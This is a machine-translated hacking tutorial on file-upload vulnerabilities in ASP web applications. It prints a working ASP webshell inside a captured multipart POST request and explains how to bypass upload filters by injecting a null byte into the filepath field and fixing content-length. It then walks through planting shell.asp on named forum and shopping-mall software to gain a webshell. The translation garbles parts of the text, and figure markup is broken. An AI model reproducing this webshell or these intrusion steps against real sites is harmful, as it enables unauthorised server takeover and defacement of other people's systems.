Example analysis ASP upload vulnerability invasion combat and expansion of the Trojan-related

"Upload vulnerability spoofing Technology"

Many programs on the network have uploaded loopholes, such as I fly the whole station program, dynamic shopping mall, Autumn Leaf Mall, Hui Letter News system. This article mainly explains the invasion of uploading vulnerabilities and some of the extended use. First we want to get the data between the client and the server, prepared an ASP Trojan ready to upload, of course, it is not successful, we want is the middle of this we submit to the server data. Generally use Wsockexpert to obtain data, because too much data can only send out the key parts as follows:

Post/bbs/upfile.asp http/1.1

....... Omitted the n more useless information

content-length:1792
Connection:keep-alive
Cache-control:no-cache
Cookie:aspsessionidqqtdtatd=nldnnhpdjeehofnfbagpojkn
-----------------------------7d52191850242
Content-disposition:form-data; Name= "FilePath"

Uploadface
-----------------------------7d52191850242
Content-disposition:form-data; Name= "Act"

Upload
-----------------------------7d52191850242
Content-disposition:form-data; Name= "File1"; Filename= "E:\ Trojan \asp\shell.asp"
Content-type:text/plain

<% Dim objFSO%>
<% Dim Fdata%>
<% Dim Objcountfile%>
<% On Error Resume Next%>
<% Set objFSO = server.createObject("Scripting.filesystemObject")%>
<% if Trim (Request ("Syfdpath")) <> "then%>
<% fdata = Request ("Cyfddata")%>
<% Set Objcountfile=objfso.createtextfile (Request ("Syfdpath"), True)%>
<% Objcountfile.write Fdata%>
<% If Err =0 then%>
<% Response.Write "<font color=red> success!" <font>%>
<% Else%>
<% Response.Write "<font color=red> <% End If%>
<% Err.Clear%>
<% End If%>
<% Objcountfile.close%>
<% Set objcountfile=nothing%>
<% Set objFSO = Nothing%>
<% Response.Write "<form action=" "method=post>"%>
<% Response.Write "Save message <font color=red> such as D:\web\x.asp </font>"%>
<% Response.Write "<input type=text name=syfdpath width=32" size=50>
<% Response.Write "<br>"%>
<% Response.Write "Address from"%>
<% =server.mappath (Request.ServerVariables ("Script_name"))%>
<% Response.Write "<br>"%>
<% Response.Write "Your message:"%>
<% Response.Write "<textarea name=cyfddata cols=80 rows=10 width=32> </textarea>"%>
<% Response.Write "<input type=submit value=sky!! > "%>
<% Response.Write "</form>"%>

-----------------------------7d52191850242
Content-disposition:form-data; Name= "FName"

E:\ Trojan \asp\shell.asp
-----------------------------7d52191850242
Content-disposition:form-data; Name= "Submit"

Upload
-----------------------------7d52191850242--

We have obtained the information we have passed, and the following is to be modified to achieve deceptive purposes. Major changes to a few:

1.content-disposition:form-data; Name= "File1"; Filename= "E:\ Trojan \asp\shell.asp"

2.content-disposition:form-data; Name= "FName"

E:\ Trojan \asp\shell.asp

3. The most important place is content-disposition:form-data; Name= the value under "filepath" should be modified. How do we add a null character to the back of the uploadface\shell.asp? Using UltraEdit is a good way to use the 16 edit, (Because the "" "the character also occupies a position, so we first enter a space, and then in UltraEdit ( The conversion of the ctrl+h to 16 in the spaces mode will be changed to 00 for the 20.

4. There is also a place to be modified, is this sentence content-length:1792 represents the number of characters to submit data.

If you modify the value of the filepath, then this length 1792 to change, the length of a letter or number is 1, do not forget that the last space that is also 1.

"Upload a loophole"

We first use the originator of the loophole to move the web forum to combat. From the principle you can see the upload time to modify the data, but also to cut packets, so there are many online tools. Now we use the Veteran's upload tool directly to simplify the complicated steps, as long as we can modify a few data. Let's look at the interface of this tool, as shown in Figure 1:

screen.width-333) this.width=screen.width-333 "border=0>

Figure 1 Veterans Upload Tool interface

Let's use the tool:

In action, enter a URL with an upload vulnerability file: http://target.net/bbs/ Upfile.asp;uppath the filepath in the first text box is the FilePath in the form, which is the upload path, followed by the name of the back door that was uploaded to the other server. Shell.asp Enter a Web program to allow uploading of the type text box in the default JPG can be (the general site is allowed to upload jpg image files); The File1 in the first text box in file is the File1 in the form, after which you fill in the Trojan path that you want to upload on the local machine. Cookies are filled with our catch. Take a packet tool such as Wsockexpert crawl cookies value, remember that it is best to register your system in the cookies value.

Here take our intrusion Network forum as an example, here action: Fill in http://www.***.com/bbs/upfile.asp;uppath first text box fill in: filepath; second fill:/shell.asp ( You can also write/bbs/shell.asp so upload success after uploading to the/bbs directory! Enter a Web program that allows you to upload the default JPG in the Type text box; File first text box enter: File1; the second is filled in: E:\ Trojan \asp\shell.asp (This ASP Trojan is the path on its own machine, Point behind the File open icon Browse to find ASP Trojan can. )

Cookies: There's no need to grab a bag here, because the upload doesn't check cookies at all. No, it will be an error if all filled out directly press the "submit" button to submit!

screen.width-333) this.width=screen.width-333 "border=0>

Figure 2 Upload Success Tips

When you click the Submit button, it is best to use your browser to access, the program will also be reported incorrectly. We use the browser to access the next.

screen.width-333) this.width=screen.width-333 "border=0>

Figure 3 can see that the upload has been successful

The next step is to write a powerful Trojan to operate, no longer in-depth.

"Upload vulnerability to combat expansion"

Not only move the network has uploaded loopholes, many programs on the network have this loophole, the principle of uploading loopholes, the master can be free to play, depending on the program code. Below we take the Joek forum as an example for everybody expands the application which uploads the flaw.
First register a normal user and log in, and then find the Uploadpage address: http://192.168.1.3/3/upload.asp?uppath=forum&upname=&uptext=jk_ Word view the source code as follows:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

When you see the source code, you should know how to fill in the Veterans Upload tool inside.
In action enter:http://192.168.1.3/3/upload.asp?action=upfile uppath The first text box enter: Up_name The second input the shell name after the upload shell.asp;file the first text box in the File_name1, the second is the Trojan file of this machine. Cookies here to fill in the bag to get the value of cookies, pay attention to be sure to fill in with Wsockexpert grab cookies information, its main function is to verify! As shown in figure:

screen.width-333) this.width=screen.width-333 "border=0>

Figure 4 Set as Figure

All set up click submit button, see Upload successful, open the browser to see if the success, as shown

screen.width-333) this.width=screen.width-333 "border=0>

Figure 5 Upload success

So far has been successful to get Webshell, it is so simple, it is important that our thinking to be flexible, but also good to find out whether there is a system upload loopholes. Of course as to what you can do after you get the Webshell, look at the security configuration of the server and your personal level oh, there is no discussion here.